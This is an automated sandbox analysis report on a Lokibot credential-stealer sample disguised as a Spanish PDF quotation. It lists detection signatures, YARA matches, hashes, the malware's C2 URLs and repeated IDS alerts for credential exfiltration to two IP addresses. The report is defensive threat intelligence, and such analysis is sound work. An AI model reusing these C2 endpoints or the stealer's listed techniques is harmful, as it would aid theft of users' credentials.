Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Cotizaci#U00f3n.pdf.exe

Overview

General Information

Sample Name:Cotizaci#U00f3n.pdf.exe
Analysis ID:451993
MD5:c3412fee75b0f8758ea9905930ec2f34
SHA1:e9245aba2ee62a7baffbccb725bca4bc0fd0302e
SHA256:a978c99ada8c0272b0670865cdecc324d883304d54f2e90ea829891183b3aaa9
Tags:exeLokilokibot
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x12fff:$des3: 68 03 66 00 00
              • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 15 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Suspicious Double ExtensionShow sources
              Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: {path}, CommandLine: {path}, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, NewProcessName: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe' , ParentImage: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, ParentProcessId: 3492, ProcessCommandLine: {path}, ProcessId: 6088

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,12_2_00403D74

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49727 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49728 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49728 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49728 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49729 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49729 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49729 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49732 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49732 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49732 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49735 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49735 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49735 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49736 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49736 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49736 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49737 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49737 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49737 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49738 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49738 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49738 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49768 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49768 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49768 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49779 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49779 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49779 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49782 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49782 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49782 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49783 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49783 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49783 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49784 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49784 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49784 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49786 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49786 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49786 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49787 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49787 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49787 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49788 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49788 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49788 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49790 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49790 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49790 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49791 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49791 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49791 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 172.67.155.45:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49793 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 104.21.6.222:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 104.21.6.222:80
